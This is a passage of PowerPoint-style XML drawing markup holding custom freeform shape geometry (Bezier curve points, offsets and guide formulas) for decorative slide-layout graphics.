                      <a:pt x="6" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="192"/>
                      <a:pt x="7" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="193"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="13" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="196"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="46"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3"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="33" y="119"/>
                      <a:pt x="35" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="39" y="100"/>
                      <a:pt x="43" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="91"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="52" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="77"/>
                      <a:pt x="58" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="71"/>
                      <a:pt x="60" y="68"/>
                      <a:pt x="60" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="58"/>
                      <a:pt x="59" y="51"/>
                      <a:pt x="59" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="39"/>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9" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="160" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="161" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="160" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="144"/>
                      <a:pt x="159" y="146"/>
                      <a:pt x="159" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="158" y="147"/>
                      <a:pt x="158" y="148"/>
                      <a:pt x="157" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="149"/>
                      <a:pt x="154" y="151"/>
                      <a:pt x="153" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="154"/>
                      <a:pt x="149" y="156"/>
                      <a:pt x="147" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="161"/>
                      <a:pt x="139" y="161"/>
                      <a:pt x="135" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="159"/>
                      <a:pt x="132" y="157"/>
                      <a:pt x="131" y="156"/>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9"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="189"/>
                      <a:pt x="121" y="192"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="202"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="202"/>
                      <a:pt x="142" y="200"/>
                      <a:pt x="145" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="192"/>
                      <a:pt x="158" y="189"/>
                      <a:pt x="165" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="171"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60" y="161"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="155"/>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7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="67"/>
                      <a:pt x="102" y="68"/>
                      <a:pt x="102" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="69"/>
                      <a:pt x="100" y="69"/>
                      <a:pt x="99" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="72"/>
                      <a:pt x="91" y="74"/>
                      <a:pt x="87" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="76" y="82"/>
                      <a:pt x="73" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>
                      <a:pt x="65" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="73"/>
                      <a:pt x="64" y="75"/>
                      <a:pt x="64" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="79"/>
                      <a:pt x="61" y="81"/>
                      <a:pt x="60" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="86"/>
                      <a:pt x="57" y="89"/>
                      <a:pt x="57" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="94"/>
                      <a:pt x="58" y="96"/>
                      <a:pt x="58" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="99"/>
                      <a:pt x="57" y="100"/>
                      <a:pt x="56" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="105"/>
                      <a:pt x="52" y="108"/>
                      <a:pt x="50" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="117"/>
                      <a:pt x="46" y="122"/>
                      <a:pt x="46" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="130"/>
                      <a:pt x="46" y="133"/>
                      <a:pt x="46" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="138"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="142"/>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3"/>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70"/>
                      <a:pt x="69" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="175"/>
                      <a:pt x="67" y="177"/>
                      <a:pt x="64" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="178"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="65" y="182"/>
                      <a:pt x="66" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="186"/>
                      <a:pt x="69" y="189"/>
                      <a:pt x="69" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="194"/>
                      <a:pt x="70" y="196"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="71" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="196"/>
                      <a:pt x="73" y="193"/>
                      <a:pt x="72" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="189"/>
                      <a:pt x="70" y="186"/>
                      <a:pt x="69" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="184"/>
                      <a:pt x="68" y="183"/>
                      <a:pt x="68" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="182"/>
                      <a:pt x="71" y="181"/>
                      <a:pt x="72" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="184"/>
                      <a:pt x="76" y="186"/>
                      <a:pt x="79" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="187"/>
                      <a:pt x="91" y="187"/>
                      <a:pt x="97" y="185"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="184"/>
                      <a:pt x="106" y="183"/>
                      <a:pt x="109" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="111" y="178"/>
                      <a:pt x="112" y="176"/>
                      <a:pt x="114" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="173"/>
                      <a:pt x="115" y="173"/>
                      <a:pt x="116" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="173"/>
                      <a:pt x="117" y="174"/>
                      <a:pt x="117" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="179"/>
                      <a:pt x="117" y="182"/>
                      <a:pt x="115" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="188"/>
                      <a:pt x="114" y="191"/>
                      <a:pt x="114" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="195"/>
                      <a:pt x="114" y="196"/>
                      <a:pt x="116" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="187"/>
                      <a:pt x="119" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="179"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="118" y="164"/>
                      <a:pt x="118" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="157"/>
                      <a:pt x="118" y="153"/>
                      <a:pt x="119" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="148"/>
                      <a:pt x="122" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="127" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="142" y="139"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="138"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="136" y="97"/>
                      <a:pt x="126" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="98"/>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2"/>
                      <a:pt x="126" y="114"/>
                      <a:pt x="124" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="103"/>
                      <a:pt x="121" y="99"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                      <a:pt x="117" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="108" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="106" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="62"/>
                      <a:pt x="106" y="61"/>
                      <a:pt x="107" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="56"/>
                      <a:pt x="106" y="54"/>
                      <a:pt x="104" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="53"/>
                      <a:pt x="97" y="51"/>
                      <a:pt x="94" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="49"/>
                      <a:pt x="91" y="47"/>
                      <a:pt x="91" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="43"/>
                      <a:pt x="91" y="42"/>
                      <a:pt x="92" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="38"/>
                      <a:pt x="95" y="37"/>
                      <a:pt x="98" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="37"/>
                      <a:pt x="101" y="38"/>
                      <a:pt x="102" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="43"/>
                      <a:pt x="103" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="49"/>
                      <a:pt x="101" y="50"/>
                      <a:pt x="102" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="32"/>
                      <a:pt x="100" y="30"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="31"/>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2"/>
                      <a:pt x="77" y="39"/>
                      <a:pt x="76" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="36"/>
                      <a:pt x="76" y="35"/>
                      <a:pt x="76" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="33"/>
                      <a:pt x="73" y="31"/>
                      <a:pt x="70" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="31"/>
                      <a:pt x="67" y="33"/>
                      <a:pt x="66" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="51"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="70" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="49"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="65" y="43"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="40"/>
                      <a:pt x="75" y="42"/>
                      <a:pt x="75" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="46"/>
                      <a:pt x="74" y="47"/>
                      <a:pt x="73" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="49"/>
                      <a:pt x="72" y="49"/>
                      <a:pt x="72" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="51"/>
                      <a:pt x="69" y="53"/>
                      <a:pt x="66" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="55"/>
                      <a:pt x="65" y="56"/>
                      <a:pt x="64" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="58"/>
                      <a:pt x="64" y="59"/>
                      <a:pt x="65" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="61"/>
                      <a:pt x="67" y="61"/>
                      <a:pt x="68" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="66"/>
                      <a:pt x="74" y="67"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="64"/>
                      <a:pt x="92" y="66"/>
                      <a:pt x="86" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="69"/>
                      <a:pt x="79" y="70"/>
                      <a:pt x="74" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="69"/>
                      <a:pt x="72" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="42"/>
                      <a:pt x="72" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="42"/>
                      <a:pt x="72" y="43"/>
                      <a:pt x="72" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="45"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="40"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="99" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="42"/>
                      <a:pt x="100" y="40"/>
                      <a:pt x="99" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99"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Freeform 372"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2672" y="1883"/>
                <a:ext cx="2" cy="3"/>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1"/>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Freeform 373"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2684" y="1883"/>
                <a:ext cx="5" cy="3"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 4"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 3 w 4"/>
                  <a:gd name="T3" fmla="*/ 0 h 2"/>
                  <a:gd name="T4" fmla="*/ 4 w 4"/>
                  <a:gd name="T5" fmla="*/ 1 h 2"/>
                  <a:gd name="T6" fmla="*/ 2 w 4"/>
                  <a:gd name="T7" fmla="*/ 1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0"/>
                      <a:pt x="3" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="0"/>
                      <a:pt x="3" y="1"/>
                      <a:pt x="4" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="1"/>
                      <a:pt x="3" y="2"/>
                      <a:pt x="2"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Freeform 374"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2043"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Freeform 375"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2193"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Freeform 376"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2342" y="372"/>
                <a:ext cx="82"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Freeform 377"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="249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Freeform 378"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2687"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Freeform 379"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2837"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Freeform 380"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="298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2"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Freeform 381"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3182"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8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2" y="35"/>
                      <a:pt x="38" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="39"/>
                      <a:pt x="31" y="42"/>
                      <a:pt x="27" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="46"/>
                      <a:pt x="19" y="48"/>
                      <a:pt x="14" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="52"/>
                      <a:pt x="5" y="53"/>
                      <a:pt x="0" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="30"/>
                      <a:pt x="11" y="29"/>
                      <a:pt x="16" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="24"/>
                      <a:pt x="27" y="21"/>
                      <a:pt x="32" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="16"/>
                      <a:pt x="43" y="13"/>
                      <a:pt x="48"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Freeform 382"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3332"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5" y="39"/>
                      <a:pt x="31" y="42"/>
                      <a:pt x="27" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="46"/>
                      <a:pt x="18" y="48"/>
                      <a:pt x="14"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Freeform 383"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="371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Freeform 384"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3905"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Freeform 385"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4100"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1" y="135"/>
                      <a:pt x="0" y="121"/>
                      <a:pt x="0" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="88"/>
                      <a:pt x="2" y="73"/>
                      <a:pt x="4" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="47"/>
                      <a:pt x="12" y="36"/>
                      <a:pt x="17" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="18"/>
                      <a:pt x="30" y="12"/>
                      <a:pt x="38" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="2"/>
                      <a:pt x="55"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Freeform 386"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4285" y="379"/>
                <a:ext cx="189" cy="218"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 66 h 218"/>
                  <a:gd name="T2" fmla="*/ 184 w 189"/>
                  <a:gd name="T3" fmla="*/ 84 h 218"/>
                  <a:gd name="T4" fmla="*/ 141 w 189"/>
                  <a:gd name="T5" fmla="*/ 84 h 218"/>
                  <a:gd name="T6" fmla="*/ 130 w 189"/>
                  <a:gd name="T7" fmla="*/ 134 h 218"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 134 h 218"/>
                  <a:gd name="T10" fmla="*/ 173 w 189"/>
                  <a:gd name="T11" fmla="*/ 151 h 218"/>
                  <a:gd name="T12" fmla="*/ 127 w 189"/>
                  <a:gd name="T13" fmla="*/ 151 h 218"/>
                  <a:gd name="T14" fmla="*/ 112 w 189"/>
                  <a:gd name="T15" fmla="*/ 218 h 218"/>
                  <a:gd name="T16" fmla="*/ 91 w 189"/>
                  <a:gd name="T17" fmla="*/ 218 h 218"/>
                  <a:gd name="T18" fmla="*/ 106 w 189"/>
                  <a:gd name="T19" fmla="*/ 151 h 218"/>
                  <a:gd name="T20" fmla="*/ 65 w 189"/>
                  <a:gd name="T21" fmla="*/ 151 h 218"/>
                  <a:gd name="T22" fmla="*/ 50 w 189"/>
                  <a:gd name="T23" fmla="*/ 218 h 218"/>
                  <a:gd name="T24" fmla="*/ 29 w 189"/>
                  <a:gd name="T25" fmla="*/ 218 h 218"/>
                  <a:gd name="T26" fmla="*/ 43 w 189"/>
                  <a:gd name="T27" fmla="*/ 151 h 218"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 151 h 218"/>
                  <a:gd name="T30" fmla="*/ 3 w 189"/>
                  <a:gd name="T31" fmla="*/ 134 h 218"/>
                  <a:gd name="T32" fmla="*/ 48 w 189"/>
                  <a:gd name="T33" fmla="*/ 134 h 218"/>
                  <a:gd name="T34" fmla="*/ 57 w 189"/>
                  <a:gd name="T35" fmla="*/ 84 h 218"/>
                  <a:gd name="T36" fmla="*/ 11 w 189"/>
                  <a:gd name="T37" fmla="*/ 84 h 218"/>
                  <a:gd name="T38" fmla="*/ 15 w 189"/>
                  <a:gd name="T39" fmla="*/ 66 h 218"/>
                  <a:gd name="T40" fmla="*/ 61 w 189"/>
                  <a:gd name="T41" fmla="*/ 66 h 218"/>
                  <a:gd name="T42" fmla="*/ 74 w 189"/>
                  <a:gd name="T43" fmla="*/ 0 h 218"/>
                  <a:gd name="T44" fmla="*/ 96 w 189"/>
